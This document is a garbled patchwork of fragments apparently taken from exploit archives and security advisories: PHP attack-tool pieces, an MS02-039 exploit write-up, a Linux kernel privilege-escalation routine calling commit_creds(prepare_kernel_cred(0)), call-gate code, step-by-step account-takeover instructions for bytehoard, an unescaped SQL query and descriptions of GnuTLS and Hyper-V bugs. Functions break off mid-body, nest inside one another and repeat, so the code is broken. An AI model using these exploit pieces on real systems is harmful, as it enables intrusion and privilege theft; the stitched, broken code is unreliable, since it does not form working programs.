returns
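function encode_str($input) { // converts the input into ASCII HTML entities, to obfuscate a bit
    // NOTE: numeric-entity encoding is only an obfuscation -- browsers decode these
    // entities back to the original characters, so this is not an escaping/XSS
    // defence by itself (the author's commented-out htmlspecialchars() hint below
    // is the escaping step).
    //
    // $input:  string to encode, byte by byte.
    // Returns: the "&#NN;" entity sequence for every byte of $input; '' for ''.
    $output = '';            // initialised: the original appended to an undefined variable
    $len = strlen($input);   // hoisted out of the loop condition
    for ($i = 0; $i < $len; $i++) {
        $output .= '&#' . ord($input[$i]) . ';';
    }
    //$output = htmlspecialchars($output);//uncomment to escape special chars
    return $output;
}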
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
function mathCaptcha(){//generates a captcha for the form
// NOTE(review): the two random operands below are assigned but never used in the
// lines shown, and this is a plain function yet it calls $this->...; the body looks
// like a merged/truncated excerpt -- confirm against the original file.
$first_number=mt_rand(1, 94);//first operation number
$second_number=mt_rand(1, 5);//second operation number
$this->get_vhcs_conf();
$this->exec_cmd();
return;
}
function getparam($param, $nec=FALSE)
{
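function getparam($param,$opt='')
{
// Look up a "-<param>" switch on the command line and return the argument after it.
//
// $param: switch name without the leading dash.
// $opt:   truthy when the switch is mandatory; if it (or its value) is missing
//         the script terminates with a message.
// Returns: the argv entry following the switch, or null when it is absent and
//          $opt is falsy.
global $argv;
$args = is_array($argv) ? $argv : array();   // tolerate contexts where $argv is unset
foreach($args as $index => $arg)
{
// strict comparison: avoids PHP's loose numeric-string equality on "-1"-style values;
// the value is the next argv entry, so guard against a trailing switch with no value
if($arg === '-'.$param && isset($args[$index+1])) return $args[$index+1];
}
if($opt) exit("\n-$param parameter required");
return null;
}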
$url = getparam("url",1); // second argument 1 marks -url as mandatory: getparam() exits when it is missing
name = dns_lookup(addr); [1]
if(name != NULL) {
/* May be we should test name's length */ [!!]
sprintf(newLine, "%s %d %d %d %d %d %d", name, [2]
net_loss(at),
net_returned(at), net_xmit(at),
net_best(at) /1000, net_avg(at)/1000,
net_worst(at)/1000);
} else {
...
sprintf(newLine, "???");
case 2; $this->bf_sql_pwd(); break;
case 3: $this->bf_usr_pwd(); break;
default: $this->usage();
}
return;
}
function code_exec($loop=1)
{
# First loop
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
+ section: in theory, the instructions could be SVN_DELTA_WINDOW_SIZE
+ 1-byte copy-from-source instructions (though this is very unlikely). */
+#define MAX_INSTRUCTION_SECTION_LEN (SVN_DELTA_WINDOW_SIZE*MAX_INSTRUCTION_LEN)
/* Encode VAL into the buffer P using the variable-length svndiff
integer format. Return the incremented value of P after the
- encoded bytes have been written.
+ encoded bytes have been written. P must point to a buffer of size
+ at least MAX_ENCODED_INT_LEN.
This encoding uses the high bit of each byte as a continuation bit
requirements to achieve the concept that a polymorphic code must be
unpredictable, which means random. I chose MS02-039[1] because I have
all the requirements for this proof of concept:
1. Microsoft Windows Buffer Overflow[2];
2. Buffer to overflow is not too big;
3. More than just one Return Address[3];
4. Incredible high number of writable addresses only in
SQLSORT.DLL[4].
-[ MS02-039 Exploit Structure
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
function deltree($deldir) {
// NOTE(review): as shown, only a directory handle is opened (errors suppressed by @)
// and nothing is deleted -- the rest of the body appears truncated in this excerpt.
$mydir=@dir($deldir);
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
PVOID * ppfn;
pmz = (PIMAGE_DOS_HEADER)
((UINT_PTR)hmMSHTML & ~(UINT_PTR)0xFFFFU);
if (pmz->e_magic != IMAGE_DOS_SIGNATURE || pmz->e_lfanew <= 0)
return NULL;
ppe = (PIMAGE_NT_HEADERS32)
((LONG_PTR)pmz + pmz->e_lfanew);
if ( ppe->Signature != IMAGE_NT_SIGNATURE ||
ppe->FileHeader.Machine != IMAGE_FILE_MACHINE_I386 ||
ISR_Entry_Point:
; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:
;
; [<error code>]
; <return RIP> <return CS> <return RFLAGS>
; [<return RSP> <return SS>]
;
; The first act of typical ISR prologue code is to build a standard
; "trap frame" on the stack -- saving registers, etc.
Address ,
sizeof(ULONG),
&btr ,
0
);
return ;
}
void AddCallGate()
{
ULONG Gdt_Addr;
ULONG CallGateData[0x4];
{ $ip = getenv( 'HTTP_X_FORWARDED_FOR' ); }
elseif ( getenv( 'HTTP_CLIENT_IP' ) )
{ $ip = getenv( 'HTTP_CLIENT_IP' ); }
else { $ip = getenv( 'REMOTE_ADDR' ); }
}
return $ip;
}
This logic is flawed because it assumes that only proxy servers set these
HTTP headers. In fact, the client is under the complete control of
the attacker, which allows the attacker to set any arbitrary HTTP header
Log into bytehoard using a non privileged user.
Perform any desired actions, then log out.
Click on the "Lost Details" link.
Input the desired username you want to have access to ("admin" to get
administrator access) and submit the data.
The system will either return an error message or a "mail sent" message.
Ignore the last message and go directly to the index.php page (easily
obtained by erasing the "?page=passreset" part)
You should have access to the desired account.
ISR_Entry_Point:
; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:
;
; [<error code>]
; <return RIP> <return CS> <return RFLAGS>
; [<return RSP> <return SS>]
;
; The first act of typical ISR prologue code is to build a standard
; "trap frame" on the stack -- saving registers, etc.
$result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` =
$userid LIMIT 1") or die('<h1>Login Error (util.inc.php 275)</h1>' .
mysql_error());
if (mysql_num_rows($result) > 0) {
$r = mysql_fetch_array($result);
if ($r['username'] !== $username) { return false; } elseif
($r['password'] !== $password) { return false; } else { return true; }
} else {
return false;
}
}
4962| $v = $this->parse_clean_value( $v );
4963|
4964| $input[ $k ] = $v;
4965| }
....|
4969| return $input;
The "parse_clean_key()" function uses the "urldecode()"
function, which means that each variable name can be encoded.
For example, the parameter "act=Members" is the same
910 if( ( !(p_co64 = MP4_BoxGet( p_demux_track->p_stbl, "stco" ) )&&
911 !(p_co64 = MP4_BoxGet( p_demux_track->p_stbl, "co64" ) ) )||
912 ( !(p_stsc = MP4_BoxGet( p_demux_track->p_stbl, "stsc" ) ) ))
913 {
914 return( VLC_EGENERIC );
915 }
.. ..
943 i_last = p_demux_track->i_chunk_count; /* last chunk proceded */
} GenericBlockCipher;
This will cause a segmentation fault, when the ciphertext_to_compressed
function tries to give decrypted data to _gnutls_auth_cipher_add_auth for HMAC
verification, even though the data length is invalid, and it should have
returned GNUTLS_E_DECRYPTION_FAILED or GNUTLS_E_UNEXPECTED_PACKET_LENGTH
instead, before _gnutls_auth_cipher_add_auth was called.
Since the error was not returned soon enough, all of the various operations
ciphertext_to_compressed performs: i.e. setting the IV, removing the padding,
setting the "true" data length with the padding stripped, checking the padding
CHAR cPath[MAX_PATH + 32] = { 0 };
DWORD dwPathLen = MAX_PATH;
lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
if (FAILED(lResult))
return FALSE;
DWORD dwType = REG_SZ;
lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
RegCloseKey(hKey);
if (FAILED(lResult))
if (($tmp == 0) && ($nrows == 1)) {
$U = DB_fetchArray($result);
$uid = $U['uid'];
if ($U['status'] == USER_ACCOUNT_DISABLED) {
// banned, jump to here to save an md5 calc.
return USER_ACCOUNT_DISABLED;
} elseif ($U['passwd'] != SEC_encryptPassword($password)) {
return -1; // failed login
} elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
return USER_ACCOUNT_AWAITING_APPROVAL;
/* Replaces the calling task's credentials with the credential set returned by
 * prepare_kernel_cred(0). Both callees are kernel symbols; how they are
 * resolved is outside this excerpt. Always returns 0. */
int getroot(void)
{
commit_creds(prepare_kernel_cred(0));
return 0;
}
int konami(void)
{
When digging into the vulnerability, in the 0x20 position of a
hypervisor packet there is a QWORD (0x3333333333333333 in the PoC) that
seems to be the length of something. This value is checked in the
function 'VidLockObjectShared', located in the driver 'vid.sys'. The
QWORD is compared against the value 0xffeff and the function returns
with error 0xC0370022 if the QWORD value is higher. Apparently, that
leaves some flag unset, so the packet processing never ends.
Unfortunately, additional and specific technical information regarding
the root and nature of this vulnerability was not provided by Microsoft.
Original URL:
http://securityreason.com/achievement_securityalert/99
--- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer to an object with the following structure containing the broken-out fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
ULONG64 n,num;
for (n=0;n<8;n++) {
num = (num << 8) | (rand()%256);
}
return (num);
}
ULONG64 expmod (ULONG64 x,ULONG64 n,ULONG64 m) {
ULONG64 r = 1;
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> fclose(f);
> if (rep)
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> fclose(f);
> if (rep)
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> fclose(f);
> if (rep)